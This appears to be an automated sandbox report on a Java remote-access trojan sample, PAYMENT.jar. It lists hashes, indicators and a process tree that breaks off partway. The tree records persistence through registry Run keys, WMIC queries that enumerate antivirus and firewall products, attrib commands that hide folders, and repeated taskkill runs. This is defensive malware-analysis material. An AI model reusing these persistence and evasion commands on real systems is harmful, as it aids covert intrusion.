Analysis
-
max time kernel
107s -
max time network
126s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
19-08-2020 07:25
Static task
static1
Behavioral task
behavioral1
Sample
PAYMENT.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
PAYMENT.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
PAYMENT.jar
-
Size
399KB
-
MD5
eb65bbf22d4e40550c189075b699b5f0
-
SHA1
f0e43eea39f34135746321b3a6652f7dabfbd279
-
SHA256
e1e1ea1f7dc17228b04b3bd0c1ed60b614fdd8b03f82a41508eabb1b51932a3b
-
SHA512
a87e6733a93c77fe09b98eed39e1905c884104da84ecfc6796a82c085f2b7e1193db0d1df0577881d412202814058661e908ce00e08349d06782e732d775b00b
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x0003000000013534-7.dat qarallax_dll -
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1480 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File created C:\Users\Admin\oWsdf\Desktop.ini java.exe File opened for modification C:\Users\Admin\oWsdf\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\oWsdf\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\oWsdf\Desktop.ini java.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\FhMGw java.exe File opened for modification C:\Windows\System32\FhMGw java.exe -
Kills process with taskkill 16 IoCs
pid Process 1680 taskkill.exe 1852 taskkill.exe 1992 taskkill.exe 1984 taskkill.exe 1460 taskkill.exe 2008 taskkill.exe 812 taskkill.exe 1992 taskkill.exe 1772 taskkill.exe 1160 taskkill.exe 888 taskkill.exe 652 taskkill.exe 1888 taskkill.exe 1372 taskkill.exe 2008 taskkill.exe 748 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1944 powershell.exe 1944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 137 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1544 WMIC.exe Token: SeSecurityPrivilege 1544 WMIC.exe Token: SeTakeOwnershipPrivilege 1544 WMIC.exe Token: SeLoadDriverPrivilege 1544 WMIC.exe Token: SeSystemProfilePrivilege 1544 WMIC.exe Token: SeSystemtimePrivilege 1544 WMIC.exe Token: SeProfSingleProcessPrivilege 1544 WMIC.exe Token: SeIncBasePriorityPrivilege 1544 WMIC.exe Token: SeCreatePagefilePrivilege 1544 WMIC.exe Token: SeBackupPrivilege 1544 WMIC.exe Token: SeRestorePrivilege 1544 WMIC.exe Token: SeShutdownPrivilege 1544 WMIC.exe Token: SeDebugPrivilege 1544 WMIC.exe Token: SeSystemEnvironmentPrivilege 1544 WMIC.exe Token: SeRemoteShutdownPrivilege 1544 WMIC.exe Token: SeUndockPrivilege 1544 WMIC.exe Token: SeManageVolumePrivilege 1544 WMIC.exe Token: 33 1544 WMIC.exe Token: 34 1544 WMIC.exe Token: 35 1544 WMIC.exe Token: SeIncreaseQuotaPrivilege 1544 WMIC.exe Token: SeSecurityPrivilege 1544 WMIC.exe Token: SeTakeOwnershipPrivilege 1544 WMIC.exe Token: SeLoadDriverPrivilege 1544 WMIC.exe Token: SeSystemProfilePrivilege 1544 WMIC.exe Token: SeSystemtimePrivilege 1544 WMIC.exe Token: SeProfSingleProcessPrivilege 1544 WMIC.exe Token: SeIncBasePriorityPrivilege 1544 WMIC.exe Token: SeCreatePagefilePrivilege 1544 WMIC.exe Token: SeBackupPrivilege 1544 WMIC.exe Token: SeRestorePrivilege 1544 WMIC.exe Token: SeShutdownPrivilege 1544 WMIC.exe Token: SeDebugPrivilege 1544 WMIC.exe Token: SeSystemEnvironmentPrivilege 1544 WMIC.exe Token: SeRemoteShutdownPrivilege 1544 WMIC.exe Token: SeUndockPrivilege 1544 WMIC.exe Token: SeManageVolumePrivilege 1544 WMIC.exe Token: 33 1544 WMIC.exe Token: 34 1544 WMIC.exe Token: 35 1544 WMIC.exe Token: SeIncreaseQuotaPrivilege 1780 WMIC.exe Token: SeSecurityPrivilege 1780 WMIC.exe Token: SeTakeOwnershipPrivilege 1780 WMIC.exe Token: SeLoadDriverPrivilege 1780 WMIC.exe Token: SeSystemProfilePrivilege 1780 WMIC.exe Token: SeSystemtimePrivilege 1780 WMIC.exe Token: SeProfSingleProcessPrivilege 1780 WMIC.exe Token: SeIncBasePriorityPrivilege 1780 WMIC.exe Token: SeCreatePagefilePrivilege 1780 WMIC.exe Token: SeBackupPrivilege 1780 WMIC.exe Token: SeRestorePrivilege 1780 WMIC.exe Token: SeShutdownPrivilege 1780 WMIC.exe Token: SeDebugPrivilege 1780 WMIC.exe Token: SeSystemEnvironmentPrivilege 1780 WMIC.exe Token: SeRemoteShutdownPrivilege 1780 WMIC.exe Token: SeUndockPrivilege 1780 WMIC.exe Token: SeManageVolumePrivilege 1780 WMIC.exe Token: 33 1780 WMIC.exe Token: 34 1780 WMIC.exe Token: 35 1780 WMIC.exe Token: SeIncreaseQuotaPrivilege 1780 WMIC.exe Token: SeSecurityPrivilege 1780 WMIC.exe Token: SeTakeOwnershipPrivilege 1780 WMIC.exe Token: SeLoadDriverPrivilege 1780 WMIC.exe Token: SeSystemProfilePrivilege 1780 WMIC.exe Token: SeSystemtimePrivilege 1780 WMIC.exe Token: SeProfSingleProcessPrivilege 1780 WMIC.exe Token: SeIncBasePriorityPrivilege 1780 WMIC.exe Token: SeCreatePagefilePrivilege 1780 WMIC.exe Token: SeBackupPrivilege 1780 WMIC.exe Token: SeRestorePrivilege 1780 WMIC.exe Token: SeShutdownPrivilege 1780 WMIC.exe Token: SeDebugPrivilege 1780 WMIC.exe Token: SeSystemEnvironmentPrivilege 1780 WMIC.exe Token: SeRemoteShutdownPrivilege 1780 WMIC.exe Token: SeUndockPrivilege 1780 WMIC.exe Token: SeManageVolumePrivilege 1780 WMIC.exe Token: 33 1780 WMIC.exe Token: 34 1780 WMIC.exe Token: 35 1780 WMIC.exe Token: SeDebugPrivilege 2008 taskkill.exe Token: SeDebugPrivilege 1680 taskkill.exe Token: SeDebugPrivilege 1852 taskkill.exe Token: SeDebugPrivilege 1160 taskkill.exe Token: SeDebugPrivilege 1992 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe Token: SeDebugPrivilege 812 taskkill.exe Token: SeDebugPrivilege 1888 taskkill.exe Token: SeDebugPrivilege 888 taskkill.exe Token: SeDebugPrivilege 1460 taskkill.exe Token: SeDebugPrivilege 1372 taskkill.exe Token: SeDebugPrivilege 652 taskkill.exe Token: SeDebugPrivilege 1992 taskkill.exe Token: SeDebugPrivilege 2008 taskkill.exe Token: SeDebugPrivilege 1772 taskkill.exe Token: SeDebugPrivilege 748 taskkill.exe Token: SeIncreaseQuotaPrivilege 1636 WMIC.exe Token: SeSecurityPrivilege 1636 WMIC.exe Token: SeTakeOwnershipPrivilege 1636 WMIC.exe Token: SeLoadDriverPrivilege 1636 WMIC.exe Token: SeSystemProfilePrivilege 1636 WMIC.exe Token: SeSystemtimePrivilege 1636 WMIC.exe Token: SeProfSingleProcessPrivilege 1636 WMIC.exe Token: SeIncBasePriorityPrivilege 1636 WMIC.exe Token: SeCreatePagefilePrivilege 1636 WMIC.exe Token: SeBackupPrivilege 1636 WMIC.exe Token: SeRestorePrivilege 1636 WMIC.exe Token: SeShutdownPrivilege 1636 WMIC.exe Token: SeDebugPrivilege 1636 WMIC.exe Token: SeSystemEnvironmentPrivilege 1636 WMIC.exe Token: SeRemoteShutdownPrivilege 1636 WMIC.exe Token: SeUndockPrivilege 1636 WMIC.exe Token: SeManageVolumePrivilege 1636 WMIC.exe Token: 33 1636 WMIC.exe Token: 34 1636 WMIC.exe Token: 35 1636 WMIC.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeIncreaseQuotaPrivilege 1636 WMIC.exe Token: SeSecurityPrivilege 1636 WMIC.exe Token: SeTakeOwnershipPrivilege 1636 WMIC.exe Token: SeLoadDriverPrivilege 1636 WMIC.exe Token: SeSystemProfilePrivilege 1636 WMIC.exe Token: SeSystemtimePrivilege 1636 WMIC.exe Token: SeProfSingleProcessPrivilege 1636 WMIC.exe Token: SeIncBasePriorityPrivilege 1636 WMIC.exe Token: SeCreatePagefilePrivilege 1636 WMIC.exe Token: SeBackupPrivilege 1636 WMIC.exe Token: SeRestorePrivilege 1636 WMIC.exe Token: SeShutdownPrivilege 1636 WMIC.exe Token: SeDebugPrivilege 1636 WMIC.exe Token: SeSystemEnvironmentPrivilege 1636 WMIC.exe Token: SeRemoteShutdownPrivilege 1636 WMIC.exe Token: SeUndockPrivilege 1636 WMIC.exe Token: SeManageVolumePrivilege 1636 WMIC.exe Token: 33 1636 WMIC.exe Token: 34 1636 WMIC.exe Token: 35 1636 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1480 java.exe -
Suspicious use of WriteProcessMemory 327 IoCs
description pid Process procid_target PID 1480 wrote to memory of 556 1480 java.exe 25 PID 1480 wrote to memory of 556 1480 java.exe 25 PID 1480 wrote to memory of 556 1480 java.exe 25 PID 1480 wrote to memory of 924 1480 java.exe 26 PID 1480 wrote to memory of 924 1480 java.exe 26 PID 1480 wrote to memory of 924 1480 java.exe 26 PID 924 wrote to memory of 1544 924 cmd.exe 27 PID 924 wrote to memory of 1544 924 cmd.exe 27 PID 924 wrote to memory of 1544 924 cmd.exe 27 PID 1480 wrote to memory of 1788 1480 java.exe 28 PID 1480 wrote to memory of 1788 1480 java.exe 28 PID 1480 wrote to memory of 1788 1480 java.exe 28 PID 1788 wrote to memory of 1780 1788 cmd.exe 29 PID 1788 wrote to memory of 1780 1788 cmd.exe 29 PID 1788 wrote to memory of 1780 1788 cmd.exe 29 PID 1480 wrote to memory of 1852 1480 java.exe 30 PID 1480 wrote to memory of 1852 1480 java.exe 30 PID 1480 wrote to memory of 1852 1480 java.exe 30 PID 1480 wrote to memory of 1876 1480 java.exe 31 PID 1480 wrote to memory of 1876 1480 java.exe 31 PID 1480 wrote to memory of 1876 1480 java.exe 31 PID 1480 wrote to memory of 1900 1480 java.exe 32 PID 1480 wrote to memory of 1900 1480 java.exe 32 PID 1480 wrote to memory of 1900 1480 java.exe 32 PID 1480 wrote to memory of 1912 1480 java.exe 33 PID 1480 wrote to memory of 1912 1480 java.exe 33 PID 1480 wrote to memory of 1912 1480 java.exe 33 PID 1480 wrote to memory of 1836 1480 java.exe 34 PID 1480 wrote to memory of 1836 1480 java.exe 34 PID 1480 wrote to memory of 1836 1480 java.exe 34 PID 1480 wrote to memory of 1832 1480 java.exe 35 PID 1480 wrote to memory of 1832 1480 java.exe 35 PID 1480 wrote to memory of 1832 1480 java.exe 35 PID 1480 wrote to memory of 1744 1480 java.exe 36 PID 1480 wrote to memory of 1744 1480 java.exe 36 PID 1480 wrote to memory of 1744 1480 java.exe 36 PID 1480 wrote to memory of 1928 1480 java.exe 37 PID 1480 wrote to memory of 1928 1480 java.exe 37 PID 1480 wrote to memory of 1928 1480 java.exe 37 PID 1480 wrote to memory of 1560 1480 java.exe 38 PID 1480 wrote to memory of 1560 1480 java.exe 38 PID 1480 wrote to memory of 1560 1480 java.exe 38 PID 1480 wrote to memory of 1944 1480 java.exe 39 PID 1480 wrote to memory of 1944 1480 java.exe 39 PID 1480 wrote to memory of 1944 1480 java.exe 39 PID 1480 wrote to memory of 1980 1480 java.exe 40 PID 1480 wrote to memory of 1980 1480 java.exe 40 PID 1480 wrote to memory of 1980 1480 java.exe 40 PID 1480 wrote to memory of 1972 1480 java.exe 41 PID 1480 wrote to memory of 1972 1480 java.exe 41 PID 1480 wrote to memory of 1972 1480 java.exe 41 PID 1480 wrote to memory of 2008 1480 java.exe 43 PID 1480 wrote to memory of 2008 1480 java.exe 43 PID 1480 wrote to memory of 2008 1480 java.exe 43 PID 1480 wrote to memory of 2028 1480 java.exe 44 PID 1480 wrote to memory of 2028 1480 java.exe 44 PID 1480 wrote to memory of 2028 1480 java.exe 44 PID 1480 wrote to memory of 1988 1480 java.exe 46 PID 1480 wrote to memory of 1988 1480 java.exe 46 PID 1480 wrote to memory of 1988 1480 java.exe 46 PID 1480 wrote to memory of 268 1480 java.exe 47 PID 1480 wrote to memory of 268 1480 java.exe 47 PID 1480 wrote to memory of 268 1480 java.exe 47 PID 1560 wrote to memory of 1068 1560 cmd.exe 51 PID 1560 wrote to memory of 1068 1560 cmd.exe 51 PID 1560 wrote to memory of 1068 1560 cmd.exe 51 PID 1480 wrote to memory of 1384 1480 java.exe 53 PID 1480 wrote to memory of 1384 1480 java.exe 53 PID 1480 wrote to memory of 1384 1480 java.exe 53 PID 1480 wrote to memory of 1220 1480 java.exe 54 PID 1480 wrote to memory of 1220 1480 java.exe 54 PID 1480 wrote to memory of 1220 1480 java.exe 54 PID 1480 wrote to memory of 1216 1480 java.exe 57 PID 1480 wrote to memory of 1216 1480 java.exe 57 PID 1480 wrote to memory of 1216 1480 java.exe 57 PID 1480 wrote to memory of 1508 1480 java.exe 58 PID 1480 wrote to memory of 1508 1480 java.exe 58 PID 1480 wrote to memory of 1508 1480 java.exe 58 PID 1480 wrote to memory of 1760 1480 java.exe 60 PID 1480 wrote to memory of 1760 1480 java.exe 60 PID 1480 wrote to memory of 1760 1480 java.exe 60 PID 1560 wrote to memory of 1296 1560 cmd.exe 62 PID 1560 wrote to memory of 1296 1560 cmd.exe 62 PID 1560 wrote to memory of 1296 1560 cmd.exe 62 PID 1480 wrote to memory of 1528 1480 java.exe 63 PID 1480 wrote to memory of 1528 1480 java.exe 63 PID 1480 wrote to memory of 1528 1480 java.exe 63 PID 1480 wrote to memory of 1768 1480 java.exe 66 PID 1480 wrote to memory of 1768 1480 java.exe 66 PID 1480 wrote to memory of 1768 1480 java.exe 66 PID 1480 wrote to memory of 1484 1480 java.exe 67 PID 1480 wrote to memory of 1484 1480 java.exe 67 PID 1480 wrote to memory of 1484 1480 java.exe 67 PID 1480 wrote to memory of 332 1480 java.exe 70 PID 1480 wrote to memory of 332 1480 java.exe 70 PID 1480 wrote to memory of 332 1480 java.exe 70 PID 1768 wrote to memory of 1860 1768 cmd.exe 71 PID 1768 wrote to memory of 1860 1768 cmd.exe 71 PID 1768 wrote to memory of 1860 1768 cmd.exe 71 PID 1480 wrote to memory of 1628 1480 java.exe 73 PID 1480 wrote to memory of 1628 1480 java.exe 73 PID 1480 wrote to memory of 1628 1480 java.exe 73 PID 1480 wrote to memory of 1936 1480 java.exe 75 PID 1480 wrote to memory of 1936 1480 java.exe 75 PID 1480 wrote to memory of 1936 1480 java.exe 75 PID 1768 wrote to memory of 1116 1768 cmd.exe 76 PID 1768 wrote to memory of 1116 1768 cmd.exe 76 PID 1768 wrote to memory of 1116 1768 cmd.exe 76 PID 1480 wrote to memory of 1380 1480 java.exe 77 PID 1480 wrote to memory of 1380 1480 java.exe 77 PID 1480 wrote to memory of 1380 1480 java.exe 77 PID 1480 wrote to memory of 1680 1480 java.exe 79 PID 1480 wrote to memory of 1680 1480 java.exe 79 PID 1480 wrote to memory of 1680 1480 java.exe 79 PID 1480 wrote to memory of 1504 1480 java.exe 81 PID 1480 wrote to memory of 1504 1480 java.exe 81 PID 1480 wrote to memory of 1504 1480 java.exe 81 PID 1480 wrote to memory of 1400 1480 java.exe 82 PID 1480 wrote to memory of 1400 1480 java.exe 82 PID 1480 wrote to memory of 1400 1480 java.exe 82 PID 1400 wrote to memory of 876 1400 cmd.exe 84 PID 1400 wrote to memory of 876 1400 cmd.exe 84 PID 1400 wrote to memory of 876 1400 cmd.exe 84 PID 1480 wrote to memory of 1792 1480 java.exe 85 PID 1480 wrote to memory of 1792 1480 java.exe 85 PID 1480 wrote to memory of 1792 1480 java.exe 85 PID 1400 wrote to memory of 1220 1400 cmd.exe 87 PID 1400 wrote to memory of 1220 1400 cmd.exe 87 PID 1400 wrote to memory of 1220 1400 cmd.exe 87 PID 1480 wrote to memory of 1040 1480 java.exe 88 PID 1480 wrote to memory of 1040 1480 java.exe 88 PID 1480 wrote to memory of 1040 1480 java.exe 88 PID 1480 wrote to memory of 884 1480 java.exe 91 PID 1480 wrote to memory of 884 1480 java.exe 91 PID 1480 wrote to memory of 884 1480 java.exe 91 PID 1480 wrote to memory of 268 1480 java.exe 92 PID 1480 wrote to memory of 268 1480 java.exe 92 PID 1480 wrote to memory of 268 1480 java.exe 92 PID 1480 wrote to memory of 1852 1480 java.exe 94 PID 1480 wrote to memory of 1852 1480 java.exe 94 PID 1480 wrote to memory of 1852 1480 java.exe 94 PID 1480 wrote to memory of 1160 1480 java.exe 97 PID 1480 wrote to memory of 1160 1480 java.exe 97 PID 1480 wrote to memory of 1160 1480 java.exe 97 PID 1480 wrote to memory of 1992 1480 java.exe 99 PID 1480 wrote to memory of 1992 1480 java.exe 99 PID 1480 wrote to memory of 1992 1480 java.exe 99 PID 1480 wrote to memory of 1984 1480 java.exe 101 PID 1480 wrote to memory of 1984 1480 java.exe 101 PID 1480 wrote to memory of 1984 1480 java.exe 101 PID 1480 wrote to memory of 812 1480 java.exe 103 PID 1480 wrote to memory of 812 1480 java.exe 103 PID 1480 wrote to memory of 812 1480 java.exe 103 PID 1480 wrote to memory of 1888 1480 java.exe 105 PID 1480 wrote to memory of 1888 1480 java.exe 105 PID 1480 wrote to memory of 1888 1480 java.exe 105 PID 1480 wrote to memory of 888 1480 java.exe 107 PID 1480 wrote to memory of 888 1480 java.exe 107 PID 1480 wrote to memory of 888 1480 java.exe 107 PID 1480 wrote to memory of 1460 1480 java.exe 109 PID 1480 wrote to memory of 1460 1480 java.exe 109 PID 1480 wrote to memory of 1460 1480 java.exe 109 PID 1480 wrote to memory of 1372 1480 java.exe 111 PID 1480 wrote to memory of 1372 1480 java.exe 111 PID 1480 wrote to memory of 1372 1480 java.exe 111 PID 1480 wrote to memory of 652 1480 java.exe 113 PID 1480 wrote to memory of 652 1480 java.exe 113 PID 1480 wrote to memory of 652 1480 java.exe 113 PID 1480 wrote to memory of 1992 1480 java.exe 115 PID 1480 wrote to memory of 1992 1480 java.exe 115 PID 1480 wrote to memory of 1992 1480 java.exe 115 PID 1480 wrote to memory of 2008 1480 java.exe 117 PID 1480 wrote to memory of 2008 1480 java.exe 117 PID 1480 wrote to memory of 2008 1480 java.exe 117 PID 1480 wrote to memory of 1772 1480 java.exe 119 PID 1480 wrote to memory of 1772 1480 java.exe 119 PID 1480 wrote to memory of 1772 1480 java.exe 119 PID 1480 wrote to memory of 748 1480 java.exe 121 PID 1480 wrote to memory of 748 1480 java.exe 121 PID 1480 wrote to memory of 748 1480 java.exe 121 PID 1480 wrote to memory of 1680 1480 java.exe 123 PID 1480 wrote to memory of 1680 1480 java.exe 123 PID 1480 wrote to memory of 1680 1480 java.exe 123 PID 268 wrote to memory of 1972 268 cmd.exe 124 PID 268 wrote to memory of 1972 268 cmd.exe 124 PID 268 wrote to memory of 1972 268 cmd.exe 124 PID 1680 wrote to memory of 1636 1680 cmd.exe 125 PID 1680 wrote to memory of 1636 1680 cmd.exe 125 PID 1680 wrote to memory of 1636 1680 cmd.exe 125 PID 268 wrote to memory of 2036 268 cmd.exe 126 PID 268 wrote to memory of 2036 268 cmd.exe 126 PID 268 wrote to memory of 2036 268 cmd.exe 126 PID 1480 wrote to memory of 1764 1480 java.exe 127 PID 1480 wrote to memory of 1764 1480 java.exe 127 PID 1480 wrote to memory of 1764 1480 java.exe 127 PID 1764 wrote to memory of 1896 1764 cmd.exe 128 PID 1764 wrote to memory of 1896 1764 cmd.exe 128 PID 1764 wrote to memory of 1896 1764 cmd.exe 128 PID 1764 wrote to memory of 1376 1764 cmd.exe 129 PID 1764 wrote to memory of 1376 1764 cmd.exe 129 PID 1764 wrote to memory of 1376 1764 cmd.exe 129 PID 1480 wrote to memory of 1372 1480 java.exe 130 PID 1480 wrote to memory of 1372 1480 java.exe 130 PID 1480 wrote to memory of 1372 1480 java.exe 130 PID 1372 wrote to memory of 1956 1372 cmd.exe 131 PID 1372 wrote to memory of 1956 1372 cmd.exe 131 PID 1372 wrote to memory of 1956 1372 cmd.exe 131 PID 1372 wrote to memory of 1704 1372 cmd.exe 132 PID 1372 wrote to memory of 1704 1372 cmd.exe 132 PID 1372 wrote to memory of 1704 1372 cmd.exe 132 PID 1480 wrote to memory of 1936 1480 java.exe 133 PID 1480 wrote to memory of 1936 1480 java.exe 133 PID 1480 wrote to memory of 1936 1480 java.exe 133 PID 1936 wrote to memory of 1188 1936 cmd.exe 134 PID 1936 wrote to memory of 1188 1936 cmd.exe 134 PID 1936 wrote to memory of 1188 1936 cmd.exe 134 PID 1936 wrote to memory of 1036 1936 cmd.exe 135 PID 1936 wrote to memory of 1036 1936 cmd.exe 135 PID 1936 wrote to memory of 1036 1936 cmd.exe 135 PID 1480 wrote to memory of 332 1480 java.exe 136 PID 1480 wrote to memory of 332 1480 java.exe 136 PID 1480 wrote to memory of 332 1480 java.exe 136 PID 332 wrote to memory of 1752 332 cmd.exe 137 PID 332 wrote to memory of 1752 332 cmd.exe 137 PID 332 wrote to memory of 1752 332 cmd.exe 137 PID 332 wrote to memory of 1824 332 cmd.exe 138 PID 332 wrote to memory of 1824 332 cmd.exe 138 PID 332 wrote to memory of 1824 332 cmd.exe 138 PID 1480 wrote to memory of 1540 1480 java.exe 139 PID 1480 wrote to memory of 1540 1480 java.exe 139 PID 1480 wrote to memory of 1540 1480 java.exe 139 PID 1540 wrote to memory of 1160 1540 cmd.exe 140 PID 1540 wrote to memory of 1160 1540 cmd.exe 140 PID 1540 wrote to memory of 1160 1540 cmd.exe 140 PID 1540 wrote to memory of 884 1540 cmd.exe 141 PID 1540 wrote to memory of 884 1540 cmd.exe 141 PID 1540 wrote to memory of 884 1540 cmd.exe 141 PID 1480 wrote to memory of 924 1480 java.exe 142 PID 1480 wrote to memory of 924 1480 java.exe 142 PID 1480 wrote to memory of 924 1480 java.exe 142 PID 924 wrote to memory of 1332 924 cmd.exe 143 PID 924 wrote to memory of 1332 924 cmd.exe 143 PID 924 wrote to memory of 1332 924 cmd.exe 143 PID 924 wrote to memory of 1536 924 cmd.exe 144 PID 924 wrote to memory of 1536 924 cmd.exe 144 PID 924 wrote to memory of 1536 924 cmd.exe 144 PID 1480 wrote to memory of 652 1480 java.exe 146 PID 1480 wrote to memory of 652 1480 java.exe 146 PID 1480 wrote to memory of 652 1480 java.exe 146 PID 652 wrote to memory of 1704 652 cmd.exe 147 PID 652 wrote to memory of 1704 652 cmd.exe 147 PID 652 wrote to memory of 1704 652 cmd.exe 147 PID 652 wrote to memory of 788 652 cmd.exe 148 PID 652 wrote to memory of 788 652 cmd.exe 148 PID 652 wrote to memory of 788 652 cmd.exe 148 PID 1480 wrote to memory of 1976 1480 java.exe 149 PID 1480 wrote to memory of 1976 1480 java.exe 149 PID 1480 wrote to memory of 1976 1480 java.exe 149 PID 1976 wrote to memory of 1788 1976 cmd.exe 150 PID 1976 wrote to memory of 1788 1976 cmd.exe 150 PID 1976 wrote to memory of 1788 1976 cmd.exe 150 PID 1976 wrote to memory of 1940 1976 cmd.exe 151 PID 1976 wrote to memory of 1940 1976 cmd.exe 151 PID 1976 wrote to memory of 1940 1976 cmd.exe 151 PID 1480 wrote to memory of 556 1480 java.exe 153 PID 1480 wrote to memory of 556 1480 java.exe 153 PID 1480 wrote to memory of 556 1480 java.exe 153 PID 556 wrote to memory of 1312 556 cmd.exe 154 PID 556 wrote to memory of 1312 556 cmd.exe 154 PID 556 wrote to memory of 1312 556 cmd.exe 154 PID 556 wrote to memory of 1036 556 cmd.exe 155 PID 556 wrote to memory of 1036 556 cmd.exe 155 PID 556 wrote to memory of 1036 556 cmd.exe 155 PID 1480 wrote to memory of 1564 1480 java.exe 156 PID 1480 wrote to memory of 1564 1480 java.exe 156 PID 1480 wrote to memory of 1564 1480 java.exe 156 PID 1564 wrote to memory of 1528 1564 cmd.exe 157 PID 1564 wrote to memory of 1528 1564 cmd.exe 157 PID 1564 wrote to memory of 1528 1564 cmd.exe 157 PID 1564 wrote to memory of 1784 1564 cmd.exe 158 PID 1564 wrote to memory of 1784 1564 cmd.exe 158 PID 1564 wrote to memory of 1784 1564 cmd.exe 158 PID 1480 wrote to memory of 2008 1480 java.exe 159 PID 1480 wrote to memory of 2008 1480 java.exe 159 PID 1480 wrote to memory of 2008 1480 java.exe 159 PID 2008 wrote to memory of 1536 2008 cmd.exe 160 PID 2008 wrote to memory of 1536 2008 cmd.exe 160 PID 2008 wrote to memory of 1536 2008 cmd.exe 160 PID 2008 wrote to memory of 2012 2008 cmd.exe 161 PID 2008 wrote to memory of 2012 2008 cmd.exe 161 PID 2008 wrote to memory of 2012 2008 cmd.exe 161 PID 1480 wrote to memory of 788 1480 java.exe 162 PID 1480 wrote to memory of 788 1480 java.exe 162 PID 1480 wrote to memory of 788 1480 java.exe 162 PID 788 wrote to memory of 1788 788 cmd.exe 163 PID 788 wrote to memory of 1788 788 cmd.exe 163 PID 788 wrote to memory of 1788 788 cmd.exe 163 PID 788 wrote to memory of 876 788 cmd.exe 164 PID 788 wrote to memory of 876 788 cmd.exe 164 PID 788 wrote to memory of 876 788 cmd.exe 164 PID 1480 wrote to memory of 2000 1480 java.exe 165 PID 1480 wrote to memory of 2000 1480 java.exe 165 PID 1480 wrote to memory of 2000 1480 java.exe 165 PID 2000 wrote to memory of 1036 2000 cmd.exe 166 PID 2000 wrote to memory of 1036 2000 cmd.exe 166 PID 2000 wrote to memory of 1036 2000 cmd.exe 166 PID 2000 wrote to memory of 812 2000 cmd.exe 167 PID 2000 wrote to memory of 812 2000 cmd.exe 167 PID 2000 wrote to memory of 812 2000 cmd.exe 167 PID 1480 wrote to memory of 2004 1480 java.exe 168 PID 1480 wrote to memory of 2004 1480 java.exe 168 PID 1480 wrote to memory of 2004 1480 java.exe 168 PID 2004 wrote to memory of 1528 2004 cmd.exe 169 PID 2004 wrote to memory of 1528 2004 cmd.exe 169 PID 2004 wrote to memory of 1528 2004 cmd.exe 169 PID 2004 wrote to memory of 1956 2004 cmd.exe 170 PID 2004 wrote to memory of 1956 2004 cmd.exe 170 PID 2004 wrote to memory of 1956 2004 cmd.exe 170 PID 1480 wrote to memory of 1704 1480 java.exe 171 PID 1480 wrote to memory of 1704 1480 java.exe 171 PID 1480 wrote to memory of 1704 1480 java.exe 171 PID 1704 wrote to memory of 1332 1704 cmd.exe 172 PID 1704 wrote to memory of 1332 1704 cmd.exe 172 PID 1704 wrote to memory of 1332 1704 cmd.exe 172 PID 1704 wrote to memory of 1460 1704 cmd.exe 173 PID 1704 wrote to memory of 1460 1704 cmd.exe 173 PID 1704 wrote to memory of 1460 1704 cmd.exe 173 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1876 attrib.exe 1900 attrib.exe 1912 attrib.exe 1836 attrib.exe 1832 attrib.exe 1744 attrib.exe 1928 attrib.exe 1852 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\PAYMENT.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:556
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1852
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1876
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\oWsdf\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1900
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\oWsdf\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1912
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:1836
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
